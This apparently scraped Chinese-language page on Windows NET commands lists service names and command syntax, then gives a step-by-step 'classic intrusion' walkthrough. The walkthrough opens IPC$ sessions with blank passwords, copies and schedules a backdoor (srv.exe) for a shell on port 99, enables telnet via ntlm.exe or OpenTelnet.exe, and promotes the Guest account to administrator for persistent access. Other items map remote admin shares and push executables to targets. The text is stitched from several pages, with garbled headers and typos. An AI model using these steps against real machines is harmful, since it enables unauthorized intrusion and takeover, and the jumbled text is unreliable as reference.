<3>/set使本計算機時鍾與指定計算機或域的時鍾同步。
下面的這4個參數是相關的,所以一起介紹
(5)Net Start
作 用:啟動服務,或顯示已啟動服務的列表。
命令格式:net start service
(6)Net Pause
作 用:暫停正在運行的服務。
命令格式:net pause service
(7)Net Continue
作 用:重新激活掛起的服務。
命令格式:net continue service
(8)NET STOP
作 用:停止 Windows NT 網路服務。
命令格式:net stop service
參數介紹:我們來看看這些服務都是什麼
<1>alerter(警報)
<2>client service for netware(Netware 客戶端服務)
<3>clipbook server(剪貼簿伺服器)
<4>computer browser(計算機瀏覽器)
<5>directory replicator(目錄復制器)
<6>ftp publishing service (ftp )(ftp 發行服務)
<7>lpdsvc
<8>net logon(網路登錄) <9>network dde網路 dde)
<10>network dde dsdm(網路 dde dsdm)
<11>network monitor agent(網路監控代理)
<12>nt lm security support provider(NT LM 安全性支持提供)
<13>ole(對象鏈接與嵌入)
<14>remote access connection manager(遠程訪問連接管理器)
<15>remote access isnsap service(遠程訪問 isnsap 服務)
<16>remote access server(遠程訪問伺服器)
<17>remote procere call (rpc) locator(遠程過程調用定位器)
<18>remote procere call (rpc) service(遠程過程調用服務)
<19>schele(調度)
<20>server(伺服器)
<21>simple tcp/ip services(簡單 TCP/IP 服務)
<22>snmp
<23>spooler(後台列印程序)
<24>tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
<25>ups (26)workstation(工作站)
<27>messenger(信使)
<28>dhcp client
<29>eventlog 以下這些SERVICE只能在NT SERVER上使用
<< 1>> )file server for macintosh
<<2>>gateway service for netware
<<3>>microsoft dhcp server
<<4>>print server for macintosh
<<5>>remoteboot
<<6>>windows internet name service
(9)Net Statistics
作 用:顯示本地工作站或伺服器服務的統計記錄。
命令格式:net statistics [workstation │ server]
參數介紹:
<1>鍵入不帶參數的net statistics列出其統計信息可用的運行服務。 <2>workstation顯示本地工作
站服務的統計信息。
<3>server顯示本地伺服器服務的統計信息。
簡單事例:
<1>net statistics server │ more顯示伺服器服務的統計信息
❼ 網路中的"NET"命令應該如何使用呢
很多,簡單說一下:
1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格)
3)映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
4)刪除一個ipc$連接
net use \\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
3 查看遠程主機的共享資源(但看不到默認共享)
net view \\IP
4 查看本地主機的共享資源(可以看到本地的默認共享)
net share
5 得到遠程主機的用戶名列表
nbtstat -A IP
6 得到本地主機的用戶列表
net user
7 查看遠程主機的當前時間
net time \\IP
8 顯示本地主機當前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠程共享:
net use z: \\IP\baby
此命令將共享名為baby的共享資源映射到z盤
11 刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del /y刪除全部
12 向遠程主機復制文件
\路徑\srv.exe \\IP\共享目錄名,如:
ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
13 遠程添加計劃任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠程主機的telnet
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
1)目標開啟了ipc$共享
2)你要擁有管理員密碼和帳號
3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠程主機的telnet
同樣需要一個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
復制之前務必用net view \\IP這個命令看一下對方的共享情況
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼
❽ 常用的網路命令- net指令
net命令是一個命令行命令,net命令有很多函數用於使用和核查計算機之間的NetBIOS連接,可以查看我們的管理網路環境、服務、用戶、登錄等信息內容;可以在DOS環境下執行 NET/? 或 NET 或 NET HELP 獲得使用幫助。所有Net命令接受選項/yes和/no(可縮寫為/y和/n)
有關參數說明:
有關參數說明:
有關參數說明:
作用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式: net time[\\computername|/domain[:name]][/set]
有關參數說明:
命令格式: net start service
命令格式: Net pause service
命令格式: Net continue service
命令格式: net stop service